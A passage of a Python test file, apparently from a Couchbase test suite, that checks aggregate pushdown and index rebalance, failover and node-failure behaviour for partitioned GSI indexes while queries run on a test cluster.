"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,count(*) from default where dept is not missing GROUP BY name,dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_partition_keys_index_keys(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(LOWER(dept)) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_groupby_trailing_keys_partition_keys(
self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(salary) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_groupby_trailing_keys_not_partition_keys(
self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(dept) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_rebalance_out_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(
self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_with_partitioned_indexes_with_concurrent_querying_stop_and_resume(
self):
resume = self.input.param("resume_stopped_rebalance", False)
resume_delay = self.input.param("resume_delay", 0)
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
stopped = RestConnection(self.master).stop_rebalance(
wait_timeout=self.wait_timeout // 3)
self.assertTrue(stopped, msg="unable to stop rebalance")
rebalance.result()
if resume:
if resume_delay > 0:
self.sleep(resume_delay,
"Sleep for some time before resume stopped rebalance")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_in_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(
self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[]),
"Partition distribution post cluster ops has some issues")
def test_swap_rebalance_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(
self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
try:
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [node_out],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
node_list.remove(node_out_str)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_failover_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# failover and rebalance out a indexer node when querying is in progress
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_failover_addback_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# failover and rebalance out a indexer node when querying is in progress
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[]),
"Partition distribution post cluster ops has some issues")
def test_kv_rebalance_out_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_with_replica_partitioned_indexes_partition_loss(
self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
#Allow indexer metadata to catch up with the last rebalance
self.sleep(60)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
total_index_item_count = 0
bucket_item_count = 0
total_partition_count = 0
for index in index_names:
bucket_item_count, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
total_index_item_count += total_item_count_after
total_partition_count += self.get_num_partitions_for_index(
RestConnection(self.index_servers[0]).get_indexer_metadata(), index)
self.assertEqual(total_index_item_count, bucket_item_count,
"Item count in index do not match after cluster ops.")
self.assertEqual(self.num_index_partitions, total_partition_count,
"Some partitions are not available after rebalance")
def test_node_failure_during_rebalance_out_partitioned_indexes(
self):
fail_node = self.input.param("fail_node", None)
if fail_node:
node_to_fail = self.servers[fail_node]
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
try:
# rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
remote_client = RemoteMachineShellConnection(node_to_fail)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
elif self.node_operation == "kill_kv":
remote_client.kill_memcached()
else:
self.reboot_node(node_to_fail)
remote_client.disconnect()
# wait for restart and warmup on all node
self.sleep(self.wait_timeout*2)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_to_fail],
self,
wait_if_warmup=True)
rebalance.result()
except Exception as ex:
self.log.info(str(ex))
# Rerun rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
self.sleep(30)
reached_rerun = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached_rerun,
"retry of the failed rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
self.log.info(index_data_after[index]["index_metadata"])
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_node_failure_during_rebalance_in_partitioned_indexes(
self):
fail_node = self.input.param("fail_node", None)
if fail_node:
node_to_fail = self.servers[fail_node]
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
